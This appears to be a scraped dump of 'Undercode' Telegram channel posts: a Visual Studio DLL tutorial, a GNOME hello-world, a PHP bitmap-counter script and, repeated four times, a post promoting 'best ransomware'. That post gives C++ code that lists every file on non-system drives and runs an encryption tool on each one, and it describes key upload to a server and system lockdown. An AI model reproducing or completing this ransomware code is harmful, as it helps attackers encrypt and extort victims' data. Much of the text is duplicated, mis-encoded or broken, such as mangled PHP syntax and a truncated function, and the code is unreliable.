โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW TO CREATE .DLL FILES ?
DLL files are dynamic-linked library files written and controlled with .DLLs make sharing, storing, and saving your code simple.we will show you how to create a DLL file with Visual Studio, the Windows application, or Visual Studio for Mac. Make sure you have โDesktop Development with C++โ checked when you install. If you already have Visual Studio but didnโt check that box, you can run the installer again to make sure you do.
powered by wiKi
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Open Visual Studio. You can find this in your Start Menu or Applications folder. Since a DLL is a library of information, it is only one piece of a project, and usually requires an accompanying app to access it.
> You can get Visual Studio for Windows here: https://docs.microsoft.com/en-us/visualstudio/install/install-visual-studio?view=vs-2019
> Visual Studio for Mac can be downloaded here: https://docs.microsoft.com/en-us/visualstudio/mac/installation?view=vsmac-2019
2) Click New and Project. The โCreate a New Projectโ dialog box will pop up.
3)
Set the options for Language, Platform, and Project Type. These will filter what kinds of project templates appear.
> Click Language to get a drop-down menu and click C++.
4) Click Platform to get a drop-down menu and click Windows.
5) Click Dynamic-link Library (DLL). Your choice will highlight blue. Click Next to continue.
6) Type a name in the Name Box for the project. For example, type โMathLibraryโ in the box for a sample name.
7) Click Create. The DLL project is created.
8)
Add a header file to the DLL. You can do this by clicking โAdd New Itemโ from โProjectโ in the menu bar.
> Select Visual C++ from the left menu of the dialog box.
> Select Header file (.h) from the center of the dialog box.
> Type the name as โMathLibrary.hโ in the name field below the menu choices.
> Click Add to generate the blank header file.
9) Type the following code into the blank header file:
// MathLibrary.h - Contains declarations of math functions
#pragma once
#ifdef MATHLIBRARY_EXPORTS
#define MATHLIBRARY_API __declspec(dllexport)
#else
#define MATHLIBRARY_API __declspec(dllimport)
#endif
// The Fibonacci recurrence relation describes a sequence F
// where F(n) is { n = 0, a
// { n = 1, b
// { n > 1, F(n-2) + F(n-1)
// for some initial integral values a and b.
// If the sequence is initialized F(0) = 1, F(1) = 1,
// then this relation produces the well-known Fibonacci
// sequence: 1, 1, 2, 3, 5, 8, 13, 21, 34, ...
// Initialize a Fibonacci relation sequence
// such that F(0) = a, F(1) = b.
// This function must be called before any other function.
extern "C" MATHLIBRARY_API void fibonacci_init(
const unsigned long long a, const unsigned long long b);
// Produce the next value in the sequence.
// Returns true on success and updates current value and index;
// false on overflow, leaves current value and index unchanged.
extern "C" MATHLIBRARY_API bool fibonacci_next();
// Get the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned long long fibonacci_current();
// Get the position of the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned fibonacci_index();
12) Add a CPP file to the DLL. You can do this by clicking Add New Item from โProjectโ in the menu bar.
> Select โVisual C++โ from the left menu of the dialog box.
> Select โC++ File (.cpp)โ from the center of the dialog box.
> Type the name as โMathLibrary.cppโ in the name field below the menu choices.
> Click Add to generate the blank file.
+ ADd ANY EXtra code for fonctional you need
13) Click Build in the menu bar. Youโll find this either above the project space (Windows) or along the top of your screen (Macs).
@ ฬตอSteave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW TO CREATE .DLL FILES ?
DLL files are dynamic-linked library files written and controlled with .DLLs make sharing, storing, and saving your code simple.we will show you how to create a DLL file with Visual Studio, the Windows application, or Visual Studio for Mac. Make sure you have โDesktop Development with C++โ checked when you install. If you already have Visual Studio but didnโt check that box, you can run the installer again to make sure you do.
powered by wiKi
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Open Visual Studio. You can find this in your Start Menu or Applications folder. Since a DLL is a library of information, it is only one piece of a project, and usually requires an accompanying app to access it.
> You can get Visual Studio for Windows here: https://docs.microsoft.com/en-us/visualstudio/install/install-visual-studio?view=vs-2019
> Visual Studio for Mac can be downloaded here: https://docs.microsoft.com/en-us/visualstudio/mac/installation?view=vsmac-2019
2) Click New and Project. The โCreate a New Projectโ dialog box will pop up.
3)
Set the options for Language, Platform, and Project Type. These will filter what kinds of project templates appear.
> Click Language to get a drop-down menu and click C++.
4) Click Platform to get a drop-down menu and click Windows.
5) Click Dynamic-link Library (DLL). Your choice will highlight blue. Click Next to continue.
6) Type a name in the Name Box for the project. For example, type โMathLibraryโ in the box for a sample name.
7) Click Create. The DLL project is created.
8)
Add a header file to the DLL. You can do this by clicking โAdd New Itemโ from โProjectโ in the menu bar.
> Select Visual C++ from the left menu of the dialog box.
> Select Header file (.h) from the center of the dialog box.
> Type the name as โMathLibrary.hโ in the name field below the menu choices.
> Click Add to generate the blank header file.
9) Type the following code into the blank header file:
// MathLibrary.h - Contains declarations of math functions
#pragma once
#ifdef MATHLIBRARY_EXPORTS
#define MATHLIBRARY_API __declspec(dllexport)
#else
#define MATHLIBRARY_API __declspec(dllimport)
#endif
// The Fibonacci recurrence relation describes a sequence F
// where F(n) is { n = 0, a
// { n = 1, b
// { n > 1, F(n-2) + F(n-1)
// for some initial integral values a and b.
// If the sequence is initialized F(0) = 1, F(1) = 1,
// then this relation produces the well-known Fibonacci
// sequence: 1, 1, 2, 3, 5, 8, 13, 21, 34, ...
// Initialize a Fibonacci relation sequence
// such that F(0) = a, F(1) = b.
// This function must be called before any other function.
extern "C" MATHLIBRARY_API void fibonacci_init(
const unsigned long long a, const unsigned long long b);
// Produce the next value in the sequence.
// Returns true on success and updates current value and index;
// false on overflow, leaves current value and index unchanged.
extern "C" MATHLIBRARY_API bool fibonacci_next();
// Get the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned long long fibonacci_current();
// Get the position of the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned fibonacci_index();
12) Add a CPP file to the DLL. You can do this by clicking Add New Item from โProjectโ in the menu bar.
> Select โVisual C++โ from the left menu of the dialog box.
> Select โC++ File (.cpp)โ from the center of the dialog box.
> Type the name as โMathLibrary.cppโ in the name field below the menu choices.
> Click Add to generate the blank file.
+ ADd ANY EXtra code for fonctional you need
13) Click Build in the menu bar. Youโll find this either above the project space (Windows) or along the top of your screen (Macs).
@ ฬตอSteave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest ransoware type 1:
Blackcat Crypto is open source Crypto-Locker. Blackcat Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) get the code :
>https://github.com/ajayrandhawa/Cryptolocker
2) (Fetch files)
Getting all files from all drive to encrypting them.
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use. I use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
3) (Encrypt files)
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
4) Create Long String Complex Password Function
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
E N J O Y
by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest ransoware type 1:
Blackcat Crypto is open source Crypto-Locker. Blackcat Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) get the code :
>https://github.com/ajayrandhawa/Cryptolocker
2) (Fetch files)
Getting all files from all drive to encrypting them.
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use. I use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
3) (Encrypt files)
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
4) Create Long String Complex Password Function
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
E N J O Y
by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Ransoware the Cryptolocker 2019
t.me/iOsDeveloppers
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Strong AES Encryption. (Unbreakable)
2) Lockdown System Functionailty.
3) Multi-Thread Encryption.
4) Powerful Web Admin Interface
5) encrypt all file, lock down the system(pc) and send keys back to the server
๐ฆinformations from :
https://github.com/ajayrandhawa/Cryptolocker
๐ฆ Getting all files from all drive to encrypting them:
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use.
> use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
2) Encrypt files :
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
3) Create Long String Complex Password Function:
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
๐ฆThis Popular Trick between hacker,
non-tested by undercOde
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Ransoware the Cryptolocker 2019
t.me/iOsDeveloppers
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Strong AES Encryption. (Unbreakable)
2) Lockdown System Functionailty.
3) Multi-Thread Encryption.
4) Powerful Web Admin Interface
5) encrypt all file, lock down the system(pc) and send keys back to the server
๐ฆinformations from :
https://github.com/ajayrandhawa/Cryptolocker
๐ฆ Getting all files from all drive to encrypting them:
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use.
> use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
2) Encrypt files :
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
3) Create Long String Complex Password Function:
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
๐ฆThis Popular Trick between hacker,
non-tested by undercOde
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Leverage GNOME Libraries to make writing applications easier
http://pinterest.com/UndercOdeOfficial
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
> This application has a menu menu and a detachable sub-menu, as well as a status bar that displays menu prompts, and automatically stores user-defined accelerator keys (hot keys). There is a standard "" About "" box In addition, all menu standard items have the ability to automatically switch languages โโ(try "" LANG = zh_TW.Big5 ./hello_world "", you will see a menu of Chinese characters).
/ * Hello World (Gnome Edition)
* Listing 1
* This code is public domain, so use it as you please.
* libraries that gnome needs, such as gtk, imlib, etc ...*/
#include
/* this is usually defined by autoconf but were just using simple makefiles */
#define VERSION ""1.0""
/* ""callback"" function (signal handler) which will quit the application*/
static void
exit_hello(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
}
/* callback function for when the window closes */
static int
delete_event(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
return FALSE; /* false means continue with closing the window */
}
/* a callback for the about menu item, it will display a simple ""About""
* dialog box standard to all gnome applications
*/
void
about_hello(GtkWidget *widget, gpointer data)
{
GtkWidget *box;
const char *authors[] = {
""James Bond"",
NULL
};
box = gnome_about_new(/*title: */ ""Hello World (Gnome Edition)"",
/*version: */VERSION,
/*copyright: */ ""(C) 1999 Secret Agents Inc."",
/*authors: */authors,
/*other comments: */
""An extremely complicated application which ""
""does absolutely nothing useful"",
NULL);
gtk_widget_show(box);
}
/* define the menus here */
static GnomeUIInfo file_menu [] = {
/* some item which is not one of the standard ones, the null
* would be the callback, however we dont want to really do anything */
GNOMEUIINFO_ITEM_NONE(""Something"",""Just an item which does nothing"",NULL),
/* standard exit item */
GNOMEUIINFO_MENU_EXIT_ITEM(exit_hello,NULL),
GNOMEUIINFO_END
};
static GnomeUIInfo help_menu [] = {
/* load the helpfiles for this application if available */
GNOMEUIINFO_HELP(""hello_world""),
/* the standard about item */
GNOMEUIINFO_MENU_ABOUT_ITEM(about_hello,NULL),
GNOMEUIINFO_END
};
/* define the main menubar */
static GnomeUIInfo main_menu [] = {
GNOMEUIINFO_MENU_FILE_TREE(file_menu),
GNOMEUIINFO_MENU_HELP_TREE(help_menu),
GNOMEUIINFO_END
};
๐ฆthen /* Our main function */
int
main(int argc, char *argv[])
{
GtkWidget *app; /* pointer to our main window */
GtkWidget *w; /* pointer to some widget */
/* initialize gnome */
......
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Leverage GNOME Libraries to make writing applications easier
http://pinterest.com/UndercOdeOfficial
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
> This application has a menu menu and a detachable sub-menu, as well as a status bar that displays menu prompts, and automatically stores user-defined accelerator keys (hot keys). There is a standard "" About "" box In addition, all menu standard items have the ability to automatically switch languages โโ(try "" LANG = zh_TW.Big5 ./hello_world "", you will see a menu of Chinese characters).
/ * Hello World (Gnome Edition)
* Listing 1
* This code is public domain, so use it as you please.
* libraries that gnome needs, such as gtk, imlib, etc ...*/
#include
/* this is usually defined by autoconf but were just using simple makefiles */
#define VERSION ""1.0""
/* ""callback"" function (signal handler) which will quit the application*/
static void
exit_hello(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
}
/* callback function for when the window closes */
static int
delete_event(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
return FALSE; /* false means continue with closing the window */
}
/* a callback for the about menu item, it will display a simple ""About""
* dialog box standard to all gnome applications
*/
void
about_hello(GtkWidget *widget, gpointer data)
{
GtkWidget *box;
const char *authors[] = {
""James Bond"",
NULL
};
box = gnome_about_new(/*title: */ ""Hello World (Gnome Edition)"",
/*version: */VERSION,
/*copyright: */ ""(C) 1999 Secret Agents Inc."",
/*authors: */authors,
/*other comments: */
""An extremely complicated application which ""
""does absolutely nothing useful"",
NULL);
gtk_widget_show(box);
}
/* define the menus here */
static GnomeUIInfo file_menu [] = {
/* some item which is not one of the standard ones, the null
* would be the callback, however we dont want to really do anything */
GNOMEUIINFO_ITEM_NONE(""Something"",""Just an item which does nothing"",NULL),
/* standard exit item */
GNOMEUIINFO_MENU_EXIT_ITEM(exit_hello,NULL),
GNOMEUIINFO_END
};
static GnomeUIInfo help_menu [] = {
/* load the helpfiles for this application if available */
GNOMEUIINFO_HELP(""hello_world""),
/* the standard about item */
GNOMEUIINFO_MENU_ABOUT_ITEM(about_hello,NULL),
GNOMEUIINFO_END
};
/* define the main menubar */
static GnomeUIInfo main_menu [] = {
GNOMEUIINFO_MENU_FILE_TREE(file_menu),
GNOMEUIINFO_MENU_HELP_TREE(help_menu),
GNOMEUIINFO_END
};
๐ฆthen /* Our main function */
int
main(int argc, char *argv[])
{
GtkWidget *app; /* pointer to our main window */
GtkWidget *w; /* pointer to some widget */
/* initialize gnome */
......
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Make an xbm picturexbm is a simple two-color bitmap image format, use more early cgi, the current used for the counter
By UndercOde
t.me/UndercOdeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐
<PHP?
setXBM (1234567890,0);
function setXBM (NUM $, $ MODE = 0) {
setType ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
๐ฆ Make an xbm picturexbm is a simple two-color bitmap image format, use more early cgi, the current used for the counter
By UndercOde
t.me/UndercOdeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐
<PHP?
setXBM (1234567890,0);
function setXBM (NUM $, $ MODE = 0) {
setType ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โโ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Make an xbm picture ? by undercode :
> xbm is a simple two-color image bitmap format. It was used more in early cgi. It is currently used on counters.
T.me/UndercOdeTesting
๐ฆLETS START:
<? php
setXBM (1234567890,0);
function setXBM ($ num, $ mode = 0) {
settype ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
Written by Under Code
